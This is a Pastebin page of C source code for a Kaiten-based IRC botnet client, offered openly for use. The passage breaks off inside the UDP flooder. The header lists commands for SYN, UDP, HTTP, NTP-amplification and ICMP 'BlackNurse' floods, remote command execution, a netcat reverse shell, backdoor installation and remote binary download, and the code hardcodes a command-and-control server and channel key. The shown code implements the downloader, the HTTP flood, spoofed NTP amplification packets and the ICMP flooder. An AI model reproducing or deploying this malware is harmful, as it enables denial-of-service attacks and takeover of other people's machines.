API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 28th, 2017
67
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 67.19 KB | None | 0 0
raw download clone embed print report
  1. /*******************************************************************************
  2. * This is a remake of Kaiten, hacked together from various versions scattered *
  3. * throughout cyberspace. New features include a variety of awesome shell one- *
  4. * liners, ability to upgrade the bot over http (via gcc or static binary), a *
  5. * feature called "HackPkg" that installs binaries without dependencies like *
  6. * wget or tftp, and more! Tip: run GETBB <tftp ip> first to get the most out *
  7. * of this bot (it will install to /var/bin, which is almost always writable). *
  8. * The LOCKUP command will kill telnetd and run a backdoor of your choice (for *
  9. * simplicity we assume you will run it on port 23). This bot is updated often,*
  10. * so check back frequently for new killer features and ddos tools. In memory *
  11. * of David Bowie, because he was an awesome musician and passed during the *
  12. * early development of this bot. By ShellzRuS and all the other developers *
  13. * that have worked on Kaiten over the last 20 years. *
  14. * *
  15. * "Hacking on kaiten is a right of passage" --Kod *
  16. *******************************************************************************
  17. * This is a IRC based distributed denial of service client. It connects to *
  18. * the server specified below and accepts commands via the channel specified. *
  19. * The syntax is: *
  20. * !<nick> <command> *
  21. * You send this message to the channel that is defined later in this code. *
  22. * Where <nick> is the nickname of the client (which can include wildcards) *
  23. * and the command is the command that should be sent. For example, if you *
  24. * want to tell all the clients with the nickname starting with N, to send you *
  25. * the help message, you type in the channel: *
  26. * !N* HELP *
  27. * That will send you a list of all the commands. You can also specify an *
  28. * astrick alone to make all client do a specific command: *
  29. * !* SH uname -a *
  30. * There are a number of commands that can be sent to the client: *
  31. * PAN <target> <port> <secs> = A SYN flooder *
  32. * UDP <target> <port> <secs> = An UDP flooder *
  33. * UNKNOWN <target> <secs> = Another non-spoof udp flooder
  34. * HTTPFLOOD <url> <secs> = An HTTP flooder
  35. * NTP <target> <ntp server> <secs> = an NTP dos flooder
  36. * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls
  37. *
  38. * NICK <nick> = Changes the nick of the client *
  39. * SERVER <server> = Changes servers *
  40. * GETSPOOFS = Gets the current spoofing *
  41. * SPOOFS <subnet> = Changes spoofing to a subnet *
  42. * DISABLE = Disables all packeting from this bot *
  43. * ENABLE = Enables all packeting from this bot *
  44. * KILL = Kills the knight *
  45. * GET <http address> <save as> = Downloads a file off the web *
  46. * VERSION = Requests version of knight *
  47. * KILLALL = Kills all current packeting *
  48. * HELP = Displays this *
  49. * IRC <command> = Sends this command to the server *
  50. * SH <command> = Executes a command *
  51. * BASH <command> = Run a bash command *
  52. * ISH <command> = Interactive SH (via privmsg) *
  53. * SHD <command> = Daemonize command *
  54. * UPDATE <http://server/bot> = Update this bot *
  55. * HACKPKG <http://server/bin> = Install binary (no dependencies) *
  56. * INSTALL <http://server/bin> = Install binary (via wget) *
  57. * BINUPDATE <http://server/bin> = Update a binary (via wget) *
  58. * SCAN <nmap opts> = Call an nmap wrapper script *
  59. * GETSSH <http:serverdropbear> = Install dropbear, run on port 30022 *
  60. * RSHELL <ip port> = Equates to nohup nc ip port *
  61. * GETBB <tftp server> = Get a proper busybox (via tftp) *
  62. * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
  63. * *
  64. * Remember, all these commands must be prefixed by a ! and the nickname that *
  65. * you want the command to be sent to (can include wildcards). There are no *
  66. * spaces in between the ! and the nickname, and there are no spaces before *
  67. * the ! *
  68. * *
  69. * - contem on efnet - Shellz&Kod *
  70. *******************************************************************************/
  71. ////////////////////////////////////////////////////////////////////////////////
  72. // EDIT THESE //
  73. ////////////////////////////////////////////////////////////////////////////////
  74. #undef STARTUP // Start on startup?
  75. #undef IDENT // Only enable this if you absolutely have to
  76. #define FAKENAME "-bash" // What you want this to hide as
  77. #define CHAN "#spartanarmy" // Channel to join
  78. #define KEY "d!ne!nhell" // The key of the channel
  79. #define PREFIX "[l33t]" // The NICK prefix
  80. int numservers=1; // Must change this to equal number of servers down there
  81. char *servers[] = { // List the servers in that format, always end in (void*)0
  82. "tempirc.anondns.net",
  83. (void*)0
  84. };
  85. ////////////////////////////////////////////////////////////////////////////////
  86. // STOP HERE! //
  87. ////////////////////////////////////////////////////////////////////////////////
  88. #include <stdarg.h>
  89. #include <errno.h>
  90. #include <stdio.h>
  91. #include <stdlib.h>
  92. #include <string.h>
  93. #include <sys/types.h>
  94. #include <sys/stat.h>
  95. #include <fcntl.h>
  96. #include <strings.h>
  97. #include <netinet/in.h>
  98. #include <unistd.h>
  99. #include <sys/time.h>
  100. #include <sys/socket.h>
  101. #include <signal.h>
  102. #include <arpa/inet.h>
  103. #include <netdb.h>
  104. #include <time.h>
  105. #include <sys/wait.h>
  106. #include <sys/ioctl.h>
  107. #include <poll.h>
  108. #include <stdint.h>
  109.  
  110. #define MAX_PACKET_SIZE 8192
  111. #define PHI 0x9e3779b9
  112.  
  113. char *useragents[] = {
  114. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  115. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  116. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  117. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  118. "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  119. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  120. "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  121. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  122. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
  123. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  124. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  125. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  126. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  127. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  128. "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
  129. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  130. "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  131. "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
  132. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
  133. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  134. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
  135. "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  136. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
  137. };
  138.  
  139.  
  140.  
  141. int sock,changeservers=0;
  142. int *pids, csum=0, actualparent;
  143. char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
  144. //unsigned int *pids;
  145. unsigned long spoofs=0, spoofsm=0, numpids=0;
  146. int strwildmatch(const char* pattern, const char* string) {
  147. switch(*pattern) {
  148. case '\0': return *string;
  149. case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
  150. case '?': return !(*string && !strwildmatch(pattern+1, string+1));
  151. default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
  152. }
  153. }
  154. int Send(int sock, char *words, ...) {
  155. static char textBuffer[1024];
  156. va_list args;
  157. va_start(args, words);
  158. vsprintf(textBuffer, words, args);
  159. va_end(args);
  160. return write(sock,textBuffer,strlen(textBuffer));
  161. }
  162. int mfork(char *sender) {
  163. unsigned int parent, *newpids, i;
  164. if (disabled == 1) {
  165. Send(sock,"NOTICE %s :Unable to comply.\n",sender);
  166. return 1;
  167. }
  168. parent=fork();
  169. if (parent <= 0) return parent;
  170. numpids++;
  171. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
  172. for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
  173. newpids[numpids-1]=parent;
  174. free(pids);
  175. pids=newpids;
  176. return parent;
  177. }
  178. unsigned long getspoof() {
  179. if (!spoofs) return rand();
  180. if (spoofsm == 1) return ntohl(spoofs);
  181. return ntohl(spoofs+(rand() % spoofsm)+1);
  182. }
  183. void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
  184. char *makestring() {
  185. char *tmp;
  186. int len=(rand()%10)+5,i;
  187. FILE *file;
  188. tmp=(char*)malloc(len+1);
  189. memset(tmp,0,len+1);
  190. if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
  191. else {
  192. int a=((rand()*rand())%45402)+1;
  193. char buf[1024];
  194. for (i=0;i<a;i++) fgets(buf,1024,file);
  195. memset(buf,0,1024);
  196. fgets(buf,1024,file);
  197. filter(buf);
  198. memcpy(tmp,buf,len);
  199. fclose(file);
  200. }
  201. return tmp;
  202. }
  203. void identd() {
  204. int sockname,sockfd,sin_size,tmpsock,i;
  205. struct sockaddr_in my_addr,their_addr;
  206. char szBuffer[1024];
  207. if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
  208. my_addr.sin_family = AF_INET;
  209. my_addr.sin_port = htons(113);
  210. my_addr.sin_addr.s_addr = INADDR_ANY;
  211. memset(&(my_addr.sin_zero), 0, 8);
  212. if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
  213. if (listen(sockfd, 1) == -1) return;
  214. if (fork() == 0) return;
  215. sin_size = sizeof(struct sockaddr_in);
  216. if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
  217. for(;;) {
  218. fd_set bla;
  219. struct timeval timee;
  220. FD_ZERO(&bla);
  221. FD_SET(tmpsock,&bla);
  222. timee.tv_sec=timee.tv_usec=60;
  223. if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
  224. if (FD_ISSET(tmpsock,&bla)) break;
  225. }
  226. i = recv(tmpsock,szBuffer,1024,0);
  227. if (i <= 0 || i >= 20) exit(0);
  228. szBuffer[i]=0;
  229. if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
  230. if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
  231. Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
  232. close(tmpsock);
  233. close(sockfd);
  234. exit(0);
  235. }
  236. long pow(long a, long b) {
  237. if (b == 0) return 1;
  238. if (b == 1) return a;
  239. return a*pow(a,b-1);
  240. }
  241. u_short in_cksum(u_short *addr, int len) {
  242. register int nleft = len;
  243. register u_short *w = addr;
  244. register int sum = 0;
  245. u_short answer =0;
  246. while (nleft > 1) {
  247. sum += *w++;
  248. nleft -= 2;
  249. }
  250. if (nleft == 1) {
  251. *(u_char *)(&answer) = *(u_char *)w;
  252. sum += answer;
  253. }
  254. sum = (sum >> 16) + (sum & 0xffff);
  255. sum += (sum >> 16);
  256. answer = ~sum;
  257. return(answer);
  258. }
  259. void get(int sock, char *sender, int argc, char **argv) {
  260. int sock2,i,d;
  261. struct sockaddr_in server;
  262. unsigned long ipaddr;
  263. char buf[1024];
  264. FILE *file;
  265. unsigned char bufm[4096];
  266. if (mfork(sender) != 0) return;
  267. if (argc < 2) {
  268. Send(sock,"NOTICE %s :GET <host> <save as>\n",sender);
  269. exit(0);
  270. }
  271. if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  272. Send(sock,"NOTICE %s :Unable to create socket.\n",sender);
  273. exit(0);
  274. }
  275. if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
  276. else strcpy(buf,argv[1]);
  277. for (i=0;i<strlen(buf) && buf[i] != '/';i++);
  278. buf[i]=0;
  279. server.sin_family = AF_INET;
  280. server.sin_port = htons(80);
  281. if ((ipaddr = inet_addr(buf)) == -1) {
  282. struct hostent *hostm;
  283. if ((hostm=gethostbyname(buf)) == NULL) {
  284. Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
  285. exit(0);
  286. }
  287. memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  288. }
  289. else server.sin_addr.s_addr = ipaddr;
  290. memset(&(server.sin_zero), 0, 8);
  291. if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  292. Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
  293. exit(0);
  294. }
  295.  
  296. Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
  297. Send(sock,"NOTICE %s :Receiving file.\n",sender);
  298. file=fopen(argv[2],"wb");
  299. while(1) {
  300. int i;
  301. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  302. if (i < 4096) bufm[i]=0;
  303. for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  304. for (d+=4;d<i;d++) fputc(bufm[d],file);
  305. goto done;
  306. }
  307. }
  308. done:
  309. Send(sock,"NOTICE %s :Saved as %s\n",sender,argv[2]);
  310. while(1) {
  311. int i,d;
  312. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  313. if (i < 4096) bufm[i]=0;
  314. for (d=0;d<i;d++) fputc(bufm[d],file);
  315. }
  316. fclose(file);
  317. close(sock2);
  318. exit(0);
  319. }
  320. void getspoofs(int sock, char *sender, int argc, char **argv) {
  321. unsigned long a=spoofs,b=spoofs+(spoofsm-1);
  322. if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
  323. else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
  324. }
  325. void version(int sock, char *sender, int argc, char **argv) {
  326. Send(sock,"NOTICE %s :Kaiten Ziggy Redo by Freak version 4.20",sender);
  327. }
  328. void nickc(int sock, char *sender, int argc, char **argv) {
  329. if (argc != 1) {
  330. Send(sock,"NOTICE %s :NICK <nick>\n",sender);
  331. return;
  332. }
  333. if (strlen(argv[1]) >= 10) {
  334. Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender);
  335. return;
  336. }
  337. Send(sock,"NICK %s\n",argv[1]);
  338. }
  339. void disable(int sock, char *sender, int argc, char **argv) {
  340. if (argc != 1) {
  341. Send(sock,"NOTICE %s :DISABLE <pass>\n",sender);
  342. Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
  343. return;
  344. }
  345. if (disabled) {
  346. Send(sock,"NOTICE %s :Already disabled.\n",sender);
  347. return;
  348. }
  349. if (strlen(argv[1]) > 254) {
  350. Send(sock,"NOTICE %s :Password too long! > 254\n",sender);
  351. return;
  352. }
  353. disabled=1;
  354. memset(dispass,0,256);
  355. strcpy(dispass,argv[1]);
  356. Send(sock,"NOTICE %s :Disable sucessful.\n");
  357. }
  358. void enable(int sock, char *sender, int argc, char **argv) {
  359. if (argc != 1) {
  360. Send(sock,"NOTICE %s :ENABLE <pass>\n",sender);
  361. Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
  362. return;
  363. }
  364. if (!disabled) {
  365. Send(sock,"NOTICE %s :Already enabled.\n",sender);
  366. return;
  367. }
  368. if (strcasecmp(dispass,argv[1])) {
  369. Send(sock,"NOTICE %s :Wrong password\n",sender);
  370. return;
  371. }
  372. disabled=0;
  373. Send(sock,"NOTICE %s :Password correct.\n",sender);
  374. }
  375. void spoof(int sock, char *sender, int argc, char **argv) {
  376. char ip[256];
  377. int i, num;
  378. unsigned long uip;
  379. if (argc != 1) {
  380. Send(sock,"NOTICE %s :Removed all spoofs\n",sender);
  381. spoofs=0;
  382. spoofsm=0;
  383. return;
  384. }
  385. if (strlen(argv[1]) > 16) {
  386. Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender);
  387. return;
  388. }
  389. strcpy(ip,argv[1]);
  390. if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
  391. for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
  392. num=-(num-4);
  393. for (i=0;i<num;i++) strcat(ip,".0");
  394. uip=inet_network(ip);
  395. if (num == 0) spoofsm=1;
  396. else spoofsm=pow(256,num);
  397. spoofs=uip;
  398. }
  399. struct iphdr {
  400. unsigned int ihl:4, version:4;
  401. unsigned char tos;
  402. unsigned short tot_len;
  403. unsigned short id;
  404. unsigned short frag_off;
  405. unsigned char ttl;
  406. unsigned char protocol;
  407. unsigned short check;
  408. unsigned long saddr;
  409. unsigned long daddr;
  410. };
  411. struct udphdr {
  412. unsigned short source;
  413. unsigned short dest;
  414. unsigned short len;
  415. unsigned short check;
  416. };
  417. struct tcphdr {
  418. unsigned short source;
  419. unsigned short dest;
  420. unsigned long seq;
  421. unsigned long ack_seq;
  422. unsigned short res1:4, doff:4;
  423. unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
  424. unsigned short window;
  425. unsigned short check;
  426. unsigned short urg_ptr;
  427. };
  428. struct send_tcp {
  429. struct iphdr ip;
  430. struct tcphdr tcp;
  431. char buf[20];
  432. };
  433. struct pseudo_header {
  434. unsigned int source_address;
  435. unsigned int dest_address;
  436. unsigned char placeholder;
  437. unsigned char protocol;
  438. unsigned short tcp_length;
  439. struct tcphdr tcp;
  440. char buf[20];
  441. };
  442. unsigned int host2ip(char *sender,char *hostname) {
  443. static struct in_addr i;
  444. struct hostent *h;
  445. if((i.s_addr = inet_addr(hostname)) == -1) {
  446. if((h = gethostbyname(hostname)) == NULL) {
  447. Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
  448. exit(0);
  449. }
  450. bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
  451. }
  452. return i.s_addr;
  453. }
  454.  
  455. void sendHTTP(int sock, char *sender, int argc, char **argv) {
  456. unsigned char *url;
  457. int end_time;
  458.  
  459. if (argc < 2) {
  460. Send(sock,"NOTICE %s :HTTPFLOOD <url> <secs>\n",sender);
  461. return;
  462. }
  463.  
  464. url = argv[1];
  465. end_time = atoi(argv[2]);
  466.  
  467. int end = time(NULL) + end_time;
  468. char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
  469. char *command[80];
  470.  
  471. Send(sock,"NOTICE %s :HTTP Flooding %s\n",sender, url);
  472.  
  473.  
  474. while(end > time(NULL))
  475. {
  476. UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
  477. sprintf(command,"wget -U \"");
  478. strcat(command, UA);
  479. strcat(command,"\" -q ");
  480. strcat(command, url);
  481. strcat(command, " -O /dev/null &");
  482. system(command);
  483. }
  484. }
  485.  
  486.  
  487.  
  488. //Struct for UDP Packet
  489. struct udpheader{
  490. unsigned short int udp_sourcePortNumber;
  491. unsigned short int udp_destinationPortNumber;
  492. unsigned short int udp_length;
  493. unsigned short int udp_checksum;
  494. };
  495.  
  496. // Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler
  497. struct ntpreqheader {
  498. unsigned char rm_vn_mode; /* response, more, version, mode */
  499. unsigned char auth_seq; /* key, sequence number */
  500. unsigned char implementation; /* implementation number */
  501. unsigned char request; /* request number */
  502. unsigned short err_nitems; /* error code/number of data items */
  503. unsigned short mbz_itemsize; /* item size */
  504. char data[40]; /* data area [32 prev](176 byte max) */
  505. unsigned long tstamp; /* time stamp, for authentication */
  506. unsigned int keyid; /* encryption key */
  507. char mac[8]; /* (optional) 8 byte auth code */
  508. };
  509.  
  510.  
  511. // Calculates the checksum of the ip header.
  512. /*
  513. unsigned short csum(unsigned short *ptr,int nbytes)
  514. {
  515. register long sum;
  516. unsigned short oddbyte;
  517. register short answer;
  518.  
  519. sum=0;
  520. while(nbytes>1) {
  521. sum+=*ptr++;
  522. nbytes-=2;
  523. }
  524. if(nbytes==1) {
  525. oddbyte=0;
  526. *((u_char*)&oddbyte)=*(u_char*)ptr;
  527. sum+=oddbyte;
  528. }
  529.  
  530. sum = (sum>>16)+(sum & 0xffff);
  531. sum = sum + (sum>>16);
  532. answer=(short)~sum;
  533. return(answer);
  534. }
  535. */
  536.  
  537. void ntp(int sock, char *sender, int argc, char **argv) {
  538. unsigned long secs;
  539. int i,get;
  540. if (mfork(sender) != 0) return;
  541. time_t start=time(NULL);
  542. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  543. if (argc < 3) {
  544. Send(sock,"NOTICE %s :NTP <target> <ntp server> <secs>\n",sender);
  545. exit(1);
  546. }
  547. secs = atol(argv[3]);
  548.  
  549.  
  550. int status; // Maintains the return values of the functions
  551. struct iphdr *ip; // Pointer to ip header struct
  552. struct udpheader *udp; // Pointer to udp header struct
  553. struct ntpreqheader *ntp; // Pointer to ntp request header struct
  554. int sockfd; // Maintains the socket file descriptor
  555. int one = 1; // Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.
  556. struct sockaddr_in dest; // Maintains the data of the destination address
  557. char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself
  558.  
  559. // Parameters check
  560. if( argc != 3){
  561. exit(1);
  562. }
  563.  
  564. // Create a socket and tells the kernel that we want to use udp as layer 4 protocol
  565. sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
  566. if (sockfd == -1){
  567. printf("Error on initializing the socket\n");
  568. exit(1);
  569. }
  570.  
  571.  
  572.  
  573. //Sets the option IP_HDRINCL
  574. status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
  575. if (status == -1){
  576. printf("Error on setting the option HDRINCL on socket\n");
  577. exit(1);
  578. }
  579.  
  580.  
  581. //"Zeroes" all the packet stack
  582. memset( packet, 0, sizeof(packet) );
  583.  
  584.  
  585. //Mounts the packet headers
  586. // [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!
  587. ip = (struct iphdr *)packet;
  588. udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
  589. ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );
  590.  
  591.  
  592. //Fill the IP Header
  593. ip->version = 4; //IPv4
  594. ip->ihl = 5; //Size of the Ip header, minimum 5
  595. ip->tos = 0; //Type of service, the default value is 0
  596. ip->tot_len = sizeof(packet); //Size of the datagram
  597. ip->id = htons(1234); //LengthIdentification Number
  598. ip->frag_off = 0; //Flags, zero represents reserved
  599. ip->ttl = 255; //Time to Live. Maximum of 255
  600. ip->protocol = IPPROTO_UDP; //Sets the UDP as the next layer protocol
  601. ip->check = 0; //Checksum.
  602. ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)
  603.  
  604. //Fills the UDP Header
  605. udp->udp_sourcePortNumber = htons( atoi( "123" ) ); //Source Port
  606. udp->udp_destinationPortNumber = htons(atoi("123")) ; //Destination Port
  607. udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet
  608. udp->udp_checksum = 0; //Checksum
  609.  
  610. //Calculate the checksums
  611. //ip->check = csum((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header
  612.  
  613. //Sets the destination data
  614. dest.sin_family = AF_INET; // Address Family Ipv4
  615. dest.sin_port = htons (atoi( "123" ) ) ; // Destination port
  616.  
  617. //Fills the NTP header
  618. //Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST
  619. //To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the
  620. // ntp request packet and hardcoded the values for the fields to make a "MON_GETLIST" request packet.
  621. // To learn more, read this: http://searchcode.com/codesearch/view/451164#127
  622. ntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7
  623. ntp->implementation=0x03; //Sets the implementation to 3
  624. ntp->request=0x2a; //Sets the request field to 42 ( MON_GETLIST )
  625. //All the other fields of the struct are zeroed
  626. ip->daddr = inet_addr( argv[2] ); //Destination IP
  627. dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endereço para onde se quer enviar o pacote
  628. Send(sock,"NOTICE %s :NTP amp attacking %s\n",sender, argv[1]);
  629.  
  630. for (;;) {
  631. status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );
  632. if(status <0){
  633. printf("Failed to send the packets\n");
  634. exit(1);
  635. }
  636.  
  637. if (i >= 50) {
  638. if (time(NULL) >= start+secs) {
  639. exit(0);
  640. }
  641. i=0;
  642. }
  643. i++;
  644. }
  645.  
  646.  
  647. }
  648.  
  649. void blacknurse(int sock, char *sender, int argc, char *argv[])
  650. {
  651. uint8_t pkt_template[] = {
  652. 0x03, 0x03, 0x0d, 0x33, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x1c, 0x4a, 0x04, 0x00, 0x00,
  653. 0x40, 0x06, 0x20, 0xc5, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0x00, 0x00,
  654. 0x00, 0x08, 0xef, 0xc1
  655. };
  656. uint8_t *pkt;
  657. struct addrinfo *ai, hints;
  658. const char *host;
  659. struct pollfd pfd;
  660. const size_t pkt_len = (sizeof pkt_template) / (sizeof pkt_template[0]);
  661. size_t i;
  662. int gai_err;
  663. int kindy;
  664. int x, secs,get;
  665.  
  666. time_t start=time(NULL);
  667. if (mfork(sender) != 0) return;
  668. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  669.  
  670. if (argc < 2) {
  671. Send(sock,"NOTICE %s :BLACKNURSE <target ip> <secs>", sender);
  672. exit(1);
  673. }
  674.  
  675. host = argv[1];
  676. secs = argv[2];
  677.  
  678. memset(&hints, 0, sizeof hints);
  679. hints.ai_family = AF_INET;
  680. if ((gai_err = getaddrinfo(host, NULL, &hints, &ai)) != 0) {
  681. fprintf(stderr, "Unable to use [%s]: %s\n", host,
  682. gai_strerror(gai_err));
  683. exit(1);
  684. }
  685. if ((kindy = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
  686. perror("socket");
  687. exit(1);
  688. }
  689. Send(sock,"NOTICE %s :Blacknursing %s", sender, host);
  690. pkt = pkt_template;
  691. pfd.fd = kindy;
  692. pfd.events = POLLOUT;
  693. for (;;) {
  694. for (i = 20; i < 20 + 8 + 4; i++) {
  695. pkt[i] = (uint8_t) rand();
  696. }
  697. if (sendto(kindy, pkt, pkt_len, 0,
  698. ai->ai_addr, ai->ai_addrlen) != (ssize_t) pkt_len) {
  699. if (errno == ENOBUFS) {
  700. poll(&pfd, 1, 1000);
  701. continue;
  702. }
  703. perror("sendto");
  704. break;
  705. }
  706. if (i >= 50) {
  707. if (time(NULL) >= start+secs) exit(0);
  708. x=0;
  709. }
  710. x++;
  711. }
  712. /* NOTREACHED */
  713. close(kindy);
  714. freeaddrinfo(ai);
  715.  
  716. return;
  717. }
  718.  
  719. void udp(int sock, char *sender, int argc, char **argv) {
  720. unsigned int port,i=0;
  721. unsigned long psize,target,secs;
  722. struct sockaddr_in s_in;
  723. struct iphdr *ip;
  724. struct udphdr *udp;
  725. char buf[1500],*str;
  726. int get;
  727. time_t start=time(NULL);
  728. if (mfork(sender) != 0) return;
  729. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  730. if (argc < 3) {
  731. Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender);
  732. exit(1);
  733. }
